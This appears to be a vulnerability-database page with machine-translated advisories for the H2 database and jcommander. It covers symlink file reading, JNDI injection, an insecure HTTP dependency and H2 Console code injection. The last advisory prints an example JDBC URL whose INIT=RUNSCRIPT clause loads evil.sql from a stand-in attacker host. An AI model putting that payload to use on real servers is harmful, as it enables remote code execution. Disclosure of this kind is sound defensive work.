H2 database permission check improper vulnerability
Improper link resolution before file access (link following)
H2 is an embeddable database management system written in Java. There is a security vulnerability in H2 1.4.197 and earlier. Due to improper permission judgment in the backup function code, attackers can use this vulnerability to read files with H2 process permissions by creating symbolic links to forged database files. Depending on H2 process permissions, files beyond the attacker's permissions may be read, such as/etc/shadow.
JNDI injection vulnerability exists in H2 database
Deserialization
H2 is an embeddable database management system written in Java. In the H2 database implementation before 2.0.206, the getConnection method takes the class name of the driver and the URL of the database as parameters. An attacker can use this vulnerability to pass the JNDI driver name and the URL to the LDAP or RMI server, thus causing remote code execution. The H2 console does not open remote access by default. When external access is enabled through - webAllowOthers or in the interface, it is vulnerable to attacks and arbitrary code execution.
Com. beust: jcommander contains function routine vulnerability from untrusted control range
Include function routines from untrusted control range
Com. beust: jcommander is the command line parsing framework of Java. Because the dependency on the insecure channel (http) is resolved, the affected version of this package is vulnerable to the resolution of the insecure dependency.
H2 Console Code Injection Vulnerability
Code injection
H2 is an embeddable database management system written in Java, which provides a console module for database management operations through web access. There is a flaw in the getConnection method implementation in h2/src/main/org/h2/server/web/WebServer.java in H2Console before 2.1.210, which allows attackers to inject parameters in the passed in JDBC URL. When jdbc: h2: mem: 1337 is passed in; IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM ' http://attacker/evil.sql ';'\ The database will be automatically created and the remote malicious sql will be loaded. The attacker can execute arbitrary code in combination with the trigger set in the sql.
No more
Loading failed, please refresh the page